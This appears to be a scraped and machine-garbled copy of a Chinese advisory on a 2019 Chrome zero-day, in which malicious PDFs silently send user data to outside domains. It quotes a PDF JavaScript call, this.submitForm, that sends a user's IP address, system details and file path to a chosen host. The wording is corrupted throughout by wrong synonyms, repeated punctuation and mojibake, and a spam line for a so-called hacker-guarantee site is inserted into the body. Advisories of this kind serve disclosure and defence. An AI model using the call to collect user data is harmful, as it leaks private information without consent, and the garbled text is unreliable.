首页 > 清静研究 > 清静转达 > 清静通告

恶意PDF文件使用Chrome浏览器0day误差清静通告

宣布时间 2019-03-01

误差编号和级别

CVE编号：暂无，，，，，危险级别：高危，，，，， CVSS分值：官方未评定

影响规模

受影响版本：

Google Chrome浏览器所有版本

误差概述

近期，，，，，来自外洋的清静研究职员在野外检测到多个PDF恶意样本。。。。。。。这些样本使用了Chrome浏览器的0day误差，，，，，以实现追踪用户并悄悄某些网络用户信息的目的。。。。。。。

现在发明了两组使用Chrome零日误差的恶意PDF文件，，，，，其中一组文件在2017年10月撒播，，，，，另一组文件在2018年9月撒播。。。。。。。第一批恶意PDF文件将用户数据发送回“readnotify.com”，，，，，第二批发送回“zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”。。。。。。。

误差的泉源在于this.submitForm()这个PDF Javascript API。。。。。。。像this.submitForm('http://google.com/test')这样一个简朴的挪用就会导致Chrome把小我私家信息发送到google.com。。。。。。。�？？？？赡鼙恍孤兜男畔ǎ�

1.用户的公共IP地点。。。。。。。

2.操作系统，，，，，Chrome版本等(在HTTP POST header中)。。。。。。。

3.用户盘算机上PDF文件的完整路径(在HTTP POST payload中)。。。。。。。

当用户使用Chrome浏览器翻开这些恶意样本时，，，，，样本会运行恶意代码，，，，，在未经用户批准的情形下，，，，，以HTTP POST数据包的形式将一些用户信息静默发送到指定域“readnotify.com ”。。。。。。。

鉴黑担保网(jhdbw)·最具权威唯一维权担保平台

除去信息泄露以外，，，，，该误差暂未发明其它使用方法，，，，，但毫无疑问，，，，，这些泄露的用户信息可以资助攻击者举行更多活动。。。。。。。

修复建议

现在该0day误差尚未有官方补丁，，，，，但Chrome团队或许将于4月尾修复该误差。。。。。。。

暂时缓解步伐：

在补丁宣布之前，，，，，建议用户使用PDF阅读器应用程序在外地审查PDF文档，，，，，直到Chrome修复误差。。。。。。�；；；；蛟贑hrome中翻开PDF文档时断开盘算机与Internet的毗连。。。。。。。

参考链接

https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html

7*24小时效劳热线

400-624-3900

官方微信

官方微博

执法声明

鉴黑担保网

网络清静防护

网络清静检测

应用清静

数据清静

清静治理

云清静

工控清静

移动及终端清静

密码应用清静

大模子应用清静

专业清静效劳

清静运营中心

知白学院

威胁情报中心

清静团队

售后效劳

公司概况

新闻动态

手艺专题

人才招聘

投资者关系

资源中心

联系鉴黑担保网

清静研究